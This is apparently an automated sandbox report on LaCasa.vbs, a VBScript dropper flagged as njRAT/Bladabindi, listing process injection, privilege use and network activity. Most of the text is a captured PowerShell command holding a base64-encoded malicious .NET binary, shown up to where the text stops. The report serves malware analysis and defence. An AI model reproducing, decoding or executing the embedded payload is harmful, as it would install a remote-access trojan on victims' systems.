Analysis Overview
SHA256
5f66c7336f8469a6ab349a3f0f3f7aca1b483f2f2a8b4ad71af79ff51a8aad6b
Threat Level: Known bad
The file LaCasa.vbs was found to be: Known bad.
Malicious Activity Summary
njRAT/Bladabindi
Blocklisted process makes network request
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-17 10:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-17 10:02
Reported
2023-08-17 10:04
Platform
win7-20230712-en
Max time kernel
117s
Max time network
120s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2292 wrote to memory of 2836 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2292 wrote to memory of 2836 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2292 wrote to memory of 2836 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LaCasa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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AKUAAADjAAAABgEAADglAQAAEQwUcuMCAHAXjQUAAAElFnL9AgBwohQUKEkAAAoXK74RDBRyGQMAcBeNBQAAASUWHyUoKAAACnIvAwBwclMDAHByXQMAcChKAAAKohQUKEkAAAoYK4gRDBRyewMAcBeNBQAAASUWco8DAHARDBRyGQMAcBaNBQAAARQUFChCAAAKKAwAAAoRCChLAAAKKEUAAAqiFBQoSQAAChk4Pv///xEMFHIqBABwF40FAAABJRYRDBRyGQMAcBaNBQAAARQUFChCAAAKKEMAAAooTAAACqIUFChJAAAKGjgA////EQwUckwEAHAXjQUAAAElFnJkBABwohQUKEkAAAobON3+//8RDBRyeAQAcBeNBQAAASUWFowJAAABohQUKEkAAAocOLn+//8RDBRykAQAcBaNBQAAARQUFBcoTQAACibeDyUoQAAAChMRKEEAAAreAN4SEQwsDREMKAwAAAooTgAACibcByg7AAAKKBUAAAYfDDjA+v//KwsHKDsAAAooFQAABt4PJShAAAAKExIoQQAACt4AKgAAAEFkAAAAAAAA0QIAABgAAADpAgAADwAAABYAAAEAAAAAUgMAAMcBAAAZBQAADwAAABYAAAECAAAAUgMAANgBAAAqBQAAEgAAAAAAAAAAAAAAAAAAAF0FAABdBQAADwAAABYAAAETMAIAyQAAAAAAAABymgQAcHKsBABwKAQAACuACAAABHKaBABwcsYEAHAoBQAAK4AJAAAEcpoEAHBy8gQAcCgGAAArgAoAAARymgQAcHIUBQBwKAcAACuACwAABHKaBABwckAFAHAoCAAAK4AMAAAEcpoEAHByYgUAcCgJAAArgA0AAARymgQAcHKABQBwKAoAACuADgAABHKaBABwcqYFAHAoCwAAK4APAAAEcsoFAHBy1gUAcCgMAAArgBAAAARymgQAcHIABgBwKA0AACuAEQAABCqODwAoEgAABg8BKBMAAAbQBQAAGygPAAAKKE8AAAooDgAAKyoAAAAbMAsAwgQAAAIAABFyHgYAcAoWKwEWRQgAAAAFAAAATwAAAGMAAABzAAAAhAAAAJAAAACeAAAArAAAADiFBAAAHo0cAAABJRZyegYAcKIlF3KWBgBwoiUYcsQGAHCiJRly2gYAcKIlGnLuBgBwoiUbcv4GAHCiJRxyFgcA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AQCSAAAAAQCSAAAAAQCSAAAAAgBoAAAAAQBrAQAAAgBEBQAAAwBnAgAAAQD8CQAAAQBrAQAAAQCSAAAAAgBoAAAAAQDnAAAAAgBRCgAAAwBEBQAABABnAgAAAQD8CQAAAQDnAAAAAgBRCgAAAQCSAAAAAgBoAAAAAQDnAAAAAgBRCgAAAwBEBQAABABnAgAAAQD8CQAAAQDnAAAAAgBRCgAAAQCSAAAAAgBoAAAAAQDnAAAAAgBRCgAAAwBEBQAABABnAgAAAQD8CQAAAQDnAAAAAgBRCgAAAQCSAAAAAgBoAAAAAQDnAAAAAgBRCgAAAwBEBQAABABnAgAAAQD8CQAAAQDnAAAAAgBRCgAAAQCSAAAAAgBoAAAAAQBrAQAAAgCDCQAAAwAvBQAABAALAgAABQDMCQAABgBEBQAABwBnAgAAAQD8CQAAAQBrAQAAAgCDCQAAAwAvBQAABAALAgAABQDMCQAAAQCSAAAAAgBoAAAAAQBgCQAAAgB3CQAAAwAHBwAABACCBAAABQDgBQAABgBEBQAABwBnAgAAAQDgBQAAAgD8CQAAAQBgCQAAAgB3CQAAAwAHBwAABACCBAAABQDgBQAAAQCSAAAAAgBoAAAAAQBgCQAAAgB3CQAAAwAHBwAABACCBAAABQDdAAAABgBEBQAABwBnAgAAAQAHBwAAAgDdAAAAAwD8CQAAAQBgCQAAAgB3CQAAAwAHBwAABACCBAAABQDdAAAAAQCSAAAAAgBoAAAAAQBgCQAAAgB3CQAAAwBEBQAABABnAgAAAQD8CQAAAQBgCQAAAgB3CQAAAQCSAAAAAgBoAAAAAQCnAQAAAgDNAQAAAwDoCAAABADXCAAABQCxCAAABgADCQAABwAmCgAACACRCgAACQCaBgAACgARBgAACwBEBQAADABnAgAAAQCaBgAAAgARBgAAAwD8CQAAAQCnAQAAAgDNAQAAAwDoCAAABADXCAAABQCxCAAABgADCQAABwAmCgAACACRCgAACQCaBgAACgARBgkAsQcBABkAsQcFABEAsQcBAAwAsQcBABQAsQcBABwAsQcBACQAsQcBAAwAkgAnABQAkgAnABwAkgAnACQAkgAnAEEAYQQsACkAIgkxACkAGgE2AFEAWQE6ACkABAVBAGEACwFIACkAsQcBADwAkgBcADQATQQnAGkATQQnADQAVwRnAGkAVwRnADQAsQcBAGkAsQcBACkAGQltAFEAdgpzAHEAsQd4AJEA7gB/AIkAsQcBALkAtQWGAMkAsQcBANEAVACMAMkArwSRANkASgKXAOEAAwGcAOEABAVBAMkA5wSiAOkA9gSnAPEAIQWuAKEA+wC0AOEAoAm5AAEBwAjBAAkBgwrIABkBsQcBAKkAsQcBAKkAdwHUAKkAmgHbAOEAoAngAKkAiwnbABkBpgbmABkBMgrsACkBMgfwAJkAXwr0AJkAyQj7AAkBKQkDAZkAcAQZAZkARAIBADEB1gQfATkBsQfbADkBwAglAeEAoAkyAUkBrgk5AVEBlwc/AVEBhQdFAVkB1AlJAWEBBAVaAWkB7QWXAOEApwlfAWkB2QHgAHEBmQlmAWEB4QFrAVkB5wlyAWkB2QG5AGkBFQWXAGkBtwGXAFkBnQWEAXkBuwmWAXkBUQebAWEBPgekAYkBsQcBAIkBQAqrAUEBsQfbAJEBDQUBAHkBjQSwATEBOwC2AeEAqwq7AaEB0wa+AbEAsQcBAKkBRADBAaEBeQTIAakBTADMAcEBhwrTAakB+gjgATEBRADpARkBzgDuARkBsAUBAPEBsQcBAPkBsQf4AQECsQcBAAkCsQfbABECsQfbABkCsQfbACECsQfbACkCsQfbADECsQfbADkCsQf9AUECsQfbAEkCsQfbAFECsQfbAFkCsQcBAGECsQcBAGkCsQcCAnECsQcBAA4AgACuAi4AGwNkBC4AIwNtBC4AKwOMBC4AMwOMBC4AOwOMBC4AQwOMBC4ASwOMBC4AUwOMBC4AWwOMBC4AYwOSBC4AawO8BC4AcwPJBC4AOgITBUAAEwAYBUMAEwAYBWMAEwAYBYMAewMTBYMAgwMTBaMAewMTBaMAgwMTBcMAEwAhBeMAewMTBeMAgwMTBSMBewMTBUMBEwAYBUMBiwMqBWMBEwAYBWMBWwOMBMACEwAYBeACEwAYBQADEwAYBQMDkwOMBSADEwAYBYADEwAYBcADEwAYBQsAwgIPAMICNgC/AgEAAAAAABYAAQAAAAAAFwAKAmoCjQKSAiIACwASABkAIABFAE4AVQBkAAABEQEtAYEB5gH1AUABJQBdAAEAQwEnAGgJAQAEgAAAAQAAAAAAAAAAAAAAAADsBgAACgAAAAAAAAAAAAAAnAK4AAAAAAAEAAAAAAAAAAAAAAClAsoFAAAAAAQAAAAAAAAAAAAAAKUClAAAAAAABAAAAAAAAAAAAAAApQIQAgAAAAAAAAAAAQAAAJcIAAAKAAQACwAEAAwACQANAAkADgAJAA8ACQAQAAkAEQAJABIACQATAAkAFAAJABUACQAWAAkAFwAJAAAAEAAWAJIAAAAAACkAkgAAABAANQCSAAAAAAA3AJIAWQApAnEAKQJZAC0CKAAzAigAOAIoAD0CKABCAigARwIoAEwCKABRAigAVgIoAFsCKABgAqEAZQIjAGUCIwCXAgAAAAAAQWAxAElFbnVtZXJhYmxlYDEAQ29udGV4dFZhbHVlYDEAa2VybmVsMzIATWljcm9zb2Z0LldpbjMyAFRvVUludDMyAFRvSW50MzIAVG9JbnQxNgBnZXRfVVRGOABMb2FkTGlicmFyeUEAQgBDAEQARQBGAFZBSQBTeXN0ZW0uSU8AUUJYdFgAUHJvamVjdERhdGEAbXNjb3JsaWIAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMATWljcm9zb2Z0LlZpc3VhbEJhc2ljAEdldFByb2Nlc3NCeUlkAGJ5dGVzUmVhZAB0aHJlYWQAU3luY2hyb25pemVkAE5ld0d1aWQAUmVwbGFjZQBDcmVhdGVJbnN0YW5jZQBHZXRIYXNoQ29kZQBFbmRJbnZva2UAQmVnaW5JbnZva2UARW51bWVyYWJsZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBoYW5kbGUARmlsZQBzZXRfV2luZG93U3R5bGUAUHJvY2Vzc1dpbmRvd1N0eWxlAHNldF9GaWxlTmFtZQBhcHBsaWNhdGlvbk5hbWUAR2V0RGlyZWN0b3J5TmFtZQBIb21lAGNvbW1hbmRMaW5lAENvbWJpbmUAQ2hhbmdlVHlwZQBWYWx1ZVR5cGUAU2VjdXJpdHlQcm90b2NvbFR5cGUAdHlwZQBTeXN0ZW0uQ29yZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAQ2xvc2UAU3RyUmV2ZXJzZQBNdWx0aWNhc3REZWxlZ2F0ZQBEZWxlZ2F0ZUFzeW5jU3RhdGUARWRpdG9yQnJvd3NhYmxlU3RhdGUAR3VpZEF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAE9iZnVzY2F0aW9uQXR0cmlidXRlAE15R3JvdXBDb2xsZWN0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAWWFub0F0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBnZXRfVmFsdWUAc2V0X1ZhbHVlAEdldE9iamVjdFZhbHVlAFNldFZhbHVlAGdldF9TaXplAGJ1ZmZlclNpemUAU2l6ZU9mAHN0YXJ0dXBfcmVnAE5ld0xhdGVCaW5kaW5nAHNldF9FbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEZyb21CYXNlNjRTdHJpbmcARG93bmxvYWRTdHJpbmcAQ29tcGFyZVN0cmluZwBUb1N0cmluZwBSZWZyZXNoAEdldEZ1bGxQYXRoAEdldEZvbGRlclBhdGgAbGVuZ3RoAEFzeW5jQ2FsbGJhY2sARGVsZWdhdGVDYWxsYmFjawBNYXJzaGFsAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABMYXRlQ2FsbABGaWJlci5kbGwAS2lsbABzZXRfU2VjdXJpdHlQcm90b2NvbABTeXN0ZW0AUmFuZG9tAEJvb2xlYW4AYnl0ZXNXcml0dGVuAEdldEZpbGVOYW1lV2l0aG91dEV4dGVuc2lvbgBWZXJzaW9uAHByb2Nlc3NJbmZvcm1hdGlvbgBTeXN0ZW0uQ29uZmlndXJhdGlvbgBTeXN0ZW0uR2xvYmFsaXphdGlvbgBJbnRlcmFjdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBFeGNlcHRpb24ARmlsZUluZm8AQ3VsdHVyZUluZm8ARmlsZVN5c3RlbUluZm8Ac3RhcnR1cEluZm8Ac2V0X1N0YXJ0SW5mbwBQcm9jZXNzU3RhcnRJbmZvAERpcmVjdG9yeUluZm8AWmVybwBzdGFydHVwAFN5c3RlbS5MaW5xAEZpYmVyAFNwZWNpYWxGb2xkZXIAQnVmZmVyAGJ1ZmZlcgBSZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBDdXJyZW50VXNlcgBUb0dlbmVyaWNQYXJhbWV0ZXIAR2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIAQml0Q29udmVydGVyAENvbXB1dGVyAENsZWFyUHJvamVjdEVycm9yAFNldFByb2plY3RFcnJvcgBBY3RpdmF0b3IALmN0b3IALmNjdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBGaWJlci5SZXNvdXJjZXMucmVzb3VyY2VzAGluaGVyaXRIYW5kbGVzAEdldEZpbGVzAEdldFZhbHVlTmFtZXMAdGhyZWFkQXR0cmlidXRlcwBwcm9jZXNzQXR0cmlidXRlcwBHZXRCeXRlcwBjcmVhdGlvbkZsYWdzAFN0cmluZ3MAUmVmZXJlbmNlRXF1YWxzAENvbnRhaW5zAENvbnZlcnNpb25zAFJ1bnRpbWVIZWxwZXJzAE9wZXJhdG9ycwBoUHJvY2VzcwBwcm9jZXNzAEdldFByb2NBZGRyZXNzAGJhc2VBZGRyZXNzAGFkZHJlc3MAc2V0X0FyZ3VtZW50cwBFeGlzdHMAQ29uY2F0AEZvcm1hdABDcmVhdGVPYmplY3QAUmVsZWFzZUNvbU9iamVjdABwcm90ZWN0AExhdGVHZXQAU3lzdGVtLk5ldABMYXRlU2V0AElBc3luY1Jlc3VsdABEZWxlZ2F0ZUFzeW5jUmVzdWx0AFdlYkNsaWVudABFbnZpcm9ubWVudABlbnZpcm9ubWVudABTdGFydABDb252ZXJ0AE5leHQAU3lzdGVtLlRleHQAY29udGV4dABBcnJheQBPcGVuU3ViS2V5AFJlZ2lzdHJ5S2V5AGdldF9Bc3NlbWJseQBBbnkAQmxvY2tDb3B5AGN1cnJlbnREaXJlY3RvcnkAUmVnaXN0cnkARW1wdHkAAAAAAB9GAGkAYgBlAHIALgBSAGUAcwBvAHUAcgBjAGUAcwAACygA+AArACgAKgABA2IAAA19AJEl+gAoAH0AIQABA2MAAAu2JfgA/f99ADQAAQNkAAALKADAJbIlKgAeIgEDZQAAEUAAQAD9/5ElQAArAEAAwCUBA3gAABHdISoAQAAfJrIlKAAqAJMhAQNoAAAR/f8fBH0A/f8aIh4mACb4AAEDdAAACygA+gAeIigAXQABAzEAA